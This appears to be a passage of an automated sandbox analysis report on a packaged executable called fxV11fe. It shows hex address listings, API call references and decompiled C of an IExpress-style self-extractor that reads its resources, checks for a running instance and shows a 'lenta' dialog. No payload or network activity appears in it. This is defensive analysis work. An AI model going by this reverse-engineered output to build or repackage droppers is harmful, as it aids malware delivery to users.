                                                                                                                                                                                                                                            0x00a0342d
                                                                                                                                                                                                                                            0x00a0342d
                                                                                                                                                                                                                                            0x00a03438
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03438
                                                                                                                                                                                                                                            0x00a03237
                                                                                                                                                                                                                                            0x00a03243
                                                                                                                                                                                                                                            0x00a03243
                                                                                                                                                                                                                                            0x00a03246
                                                                                                                                                                                                                                            0x00a032ee
                                                                                                                                                                                                                                            0x00a032f4
                                                                                                                                                                                                                                            0x00a032f6
                                                                                                                                                                                                                                            0x00a033d4
                                                                                                                                                                                                                                            0x00a033d6
                                                                                                                                                                                                                                            0x00a033db
                                                                                                                                                                                                                                            0x00a033dc
                                                                                                                                                                                                                                            0x00a033de
                                                                                                                                                                                                                                            0x00a033df
                                                                                                                                                                                                                                            0x00a03370
                                                                                                                                                                                                                                            0x00a03372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03372
                                                                                                                                                                                                                                            0x00a032fc
                                                                                                                                                                                                                                            0x00a03301
                                                                                                                                                                                                                                            0x00a03301
                                                                                                                                                                                                                                            0x00a03303
                                                                                                                                                                                                                                            0x00a03304
                                                                                                                                                                                                                                            0x00a03304
                                                                                                                                                                                                                                            0x00a0330a
                                                                                                                                                                                                                                            0x00a0330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03313
                                                                                                                                                                                                                                            0x00a03318
                                                                                                                                                                                                                                            0x00a0331a
                                                                                                                                                                                                                                            0x00a03331
                                                                                                                                                                                                                                            0x00a03332
                                                                                                                                                                                                                                            0x00a0333a
                                                                                                                                                                                                                                            0x00a0333d
                                                                                                                                                                                                                                            0x00a0337c
                                                                                                                                                                                                                                            0x00a03388
                                                                                                                                                                                                                                            0x00a0338f
                                                                                                                                                                                                                                            0x00a03394
                                                                                                                                                                                                                                            0x00a03396
                                                                                                                                                                                                                                            0x00a033a4
                                                                                                                                                                                                                                            0x00a033ab
                                                                                                                                                                                                                                            0x00a033b6
                                                                                                                                                                                                                                            0x00a033be
                                                                                                                                                                                                                                            0x00a033c3
                                                                                                                                                                                                                                            0x00a033c5
                                                                                                                                                                                                                                            0x00a03435
                                                                                                                                                                                                                                            0x00a03437
                                                                                                                                                                                                                                            0x00a03437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03437
                                                                                                                                                                                                                                            0x00a033c7
                                                                                                                                                                                                                                            0x00a033c9
                                                                                                                                                                                                                                            0x00a033cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a033cc
                                                                                                                                                                                                                                            0x00a033ad
                                                                                                                                                                                                                                            0x00a033b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a033b4
                                                                                                                                                                                                                                            0x00a03398
                                                                                                                                                                                                                                            0x00a03399
                                                                                                                                                                                                                                            0x00a0339b
                                                                                                                                                                                                                                            0x00a0339c
                                                                                                                                                                                                                                            0x00a0339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0339d
                                                                                                                                                                                                                                            0x00a0334c
                                                                                                                                                                                                                                            0x00a03351
                                                                                                                                                                                                                                            0x00a03354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0335c
                                                                                                                                                                                                                                            0x00a03362
                                                                                                                                                                                                                                            0x00a03364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03366
                                                                                                                                                                                                                                            0x00a03367
                                                                                                                                                                                                                                            0x00a03369
                                                                                                                                                                                                                                            0x00a0336a
                                                                                                                                                                                                                                            0x00a0336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0336b
                                                                                                                                                                                                                                            0x00a0331c
                                                                                                                                                                                                                                            0x00a03323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03329
                                                                                                                                                                                                                                            0x00a0332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0332b
                                                                                                                                                                                                                                            0x00a0324c
                                                                                                                                                                                                                                            0x00a0324c
                                                                                                                                                                                                                                            0x00a0324f
                                                                                                                                                                                                                                            0x00a032c8
                                                                                                                                                                                                                                            0x00a032ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a032ce
                                                                                                                                                                                                                                            0x00a03251
                                                                                                                                                                                                                                            0x00a03256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03271
                                                                                                                                                                                                                                            0x00a03277
                                                                                                                                                                                                                                            0x00a03279
                                                                                                                                                                                                                                            0x00a03298
                                                                                                                                                                                                                                            0x00a0329d
                                                                                                                                                                                                                                            0x00a0329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a032b0
                                                                                                                                                                                                                                            0x00a032b6
                                                                                                                                                                                                                                            0x00a032b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a032be
                                                                                                                                                                                                                                            0x00a03280
                                                                                                                                                                                                                                            0x00a03289
                                                                                                                                                                                                                                            0x00a0328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0328e
                                                                                                                                                                                                                                            0x00a0327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00A08598,00000200), ref: 00A03271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A033E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A033F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A03410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00A03426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00A0342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A0343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                                                                                                                                                                                            • API String ID: 2418873061-7669773
                                                                                                                                                                                                                                            • Opcode ID: 1a09ebf679646a72abe6f9ddafe35c43459868b8c2f793263fe39c21a45c3cb0
                                                                                                                                                                                                                                            • Instruction ID: b12d4944085488c943d0f3f19168968969d4340f787c3fa000fe9973212859a7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a09ebf679646a72abe6f9ddafe35c43459868b8c2f793263fe39c21a45c3cb0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88514A7234034C7BEF219B757CCCFBB295DEB9AB55F104128F2469A1D1CAB58A039262
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A02CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0xa09a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0xa09140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0xa08a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0xa088c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0xa093ec = 1;
                                                                                                                                                                                                                                            				_t20 = E00A0468F("TITLE", 0xa09154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0xa0858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0xa09a34;
                                                                                                                                                                                                                                            					if(E00A0468F("EXTRACTOPT", 0xa09a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0xa09a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0xa09120 =  *0xa09120 & _t65;
                                                                                                                                                                                                                                            							if(E00A05C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0xa08a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa08184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa08a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E00A036EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0xa09a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0xa09a34 & 0x00000100) == 0 || ( *0xa08a38 & 0x00000001) != 0 || E00A018A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00A06517(_t57, 0x7d6, _t34, E00A019E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A02390(0xa08a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E00A044B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E00A0468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0xa08588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0xa09a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E00A044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E00A044B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0xa08588);
                                                                                                                                                                                                                                            										 *0xa09124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a02cb5
                                                                                                                                                                                                                                            0x00a02cbc
                                                                                                                                                                                                                                            0x00a02cc7
                                                                                                                                                                                                                                            0x00a02cc9
                                                                                                                                                                                                                                            0x00a02cd1
                                                                                                                                                                                                                                            0x00a02cd3
                                                                                                                                                                                                                                            0x00a02cd9
                                                                                                                                                                                                                                            0x00a02ce9
                                                                                                                                                                                                                                            0x00a02cf9
                                                                                                                                                                                                                                            0x00a02d0e
                                                                                                                                                                                                                                            0x00a02d15
                                                                                                                                                                                                                                            0x00a02d1c
                                                                                                                                                                                                                                            0x00a02ef3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02d2d
                                                                                                                                                                                                                                            0x00a02d34
                                                                                                                                                                                                                                            0x00a02d3b
                                                                                                                                                                                                                                            0x00a02d40
                                                                                                                                                                                                                                            0x00a02d48
                                                                                                                                                                                                                                            0x00a02d59
                                                                                                                                                                                                                                            0x00a02d84
                                                                                                                                                                                                                                            0x00a02e1f
                                                                                                                                                                                                                                            0x00a02e1f
                                                                                                                                                                                                                                            0x00a02e2e
                                                                                                                                                                                                                                            0x00a02e41
                                                                                                                                                                                                                                            0x00a02e5a
                                                                                                                                                                                                                                            0x00a02e62
                                                                                                                                                                                                                                            0x00a02e6c
                                                                                                                                                                                                                                            0x00a02e6c
                                                                                                                                                                                                                                            0x00a02e75
                                                                                                                                                                                                                                            0x00a02e77
                                                                                                                                                                                                                                            0x00a02e77
                                                                                                                                                                                                                                            0x00a02e84
                                                                                                                                                                                                                                            0x00a02e8b
                                                                                                                                                                                                                                            0x00a02e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02e96
                                                                                                                                                                                                                                            0x00a02e96
                                                                                                                                                                                                                                            0x00a02e9e
                                                                                                                                                                                                                                            0x00a02ea2
                                                                                                                                                                                                                                            0x00a02eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02ece
                                                                                                                                                                                                                                            0x00a02ede
                                                                                                                                                                                                                                            0x00a02eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02eed
                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02eef
                                                                                                                                                                                                                                            0x00a02ea2
                                                                                                                                                                                                                                            0x00a02e86
                                                                                                                                                                                                                                            0x00a02e88
                                                                                                                                                                                                                                            0x00a02e88
                                                                                                                                                                                                                                            0x00a02e43
                                                                                                                                                                                                                                            0x00a02e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02e48
                                                                                                                                                                                                                                            0x00a02e30
                                                                                                                                                                                                                                            0x00a02e30
                                                                                                                                                                                                                                            0x00a02ef8
                                                                                                                                                                                                                                            0x00a02f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f01
                                                                                                                                                                                                                                            0x00a02d8a
                                                                                                                                                                                                                                            0x00a02d8f
                                                                                                                                                                                                                                            0x00a02da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02da3
                                                                                                                                                                                                                                            0x00a02dae
                                                                                                                                                                                                                                            0x00a02db4
                                                                                                                                                                                                                                            0x00a02dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02dca
                                                                                                                                                                                                                                            0x00a02dd3
                                                                                                                                                                                                                                            0x00a02df5
                                                                                                                                                                                                                                            0x00a02e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02dd5
                                                                                                                                                                                                                                            0x00a02dde
                                                                                                                                                                                                                                            0x00a02de3
                                                                                                                                                                                                                                            0x00a02e04
                                                                                                                                                                                                                                            0x00a02e0a
                                                                                                                                                                                                                                            0x00a02e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02e10
                                                                                                                                                                                                                                            0x00a02dd3
                                                                                                                                                                                                                                            0x00a02dbb
                                                                                                                                                                                                                                            0x00a02da1
                                                                                                                                                                                                                                            0x00a02d5b
                                                                                                                                                                                                                                            0x00a02d5b
                                                                                                                                                                                                                                            0x00a02d5d
                                                                                                                                                                                                                                            0x00a02d69
                                                                                                                                                                                                                                            0x00a02d6e
                                                                                                                                                                                                                                            0x00a02f06
                                                                                                                                                                                                                                            0x00a02f06
                                                                                                                                                                                                                                            0x00a02f06
                                                                                                                                                                                                                                            0x00a02d59
                                                                                                                                                                                                                                            0x00a02f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02CF9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A02DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A02E0A
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                            • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                            • Opcode ID: c2d057b42de9af2676781e0d4c9ee90b946f8001245789df04d0720e9b1779fc
                                                                                                                                                                                                                                            • Instruction ID: f1987a70d6f857a252aa805dcf9edbb261521d543ae8e9a944a15cfd5e930550
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d057b42de9af2676781e0d4c9ee90b946f8001245789df04d0720e9b1779fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A151E77078030DABE760EB64FD4EBBB2A98EB49740F004139F681D55E1DBB88C538715
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E00A034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0xa091d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0xa08584 = _t35;
                                                                                                                                                                                                                                            					E00A043D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0xa08184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00A04FE0, 0, 0, 0xa08798);
                                                                                                                                                                                                                                            					 *0xa0879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E00A044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0xa0858c);
                                                                                                                                                                                                                                            					_t38 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E00A044B9(_t38, 0x4b2, 0xa01140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0xa091d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0xa0858c);
                                                                                                                                                                                                                                            						_t39 =  *0xa0879c; // 0x0
                                                                                                                                                                                                                                            						E00A03680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0xa0858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0xa0879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a034fb
                                                                                                                                                                                                                                            0x00a034fe
                                                                                                                                                                                                                                            0x00a03665
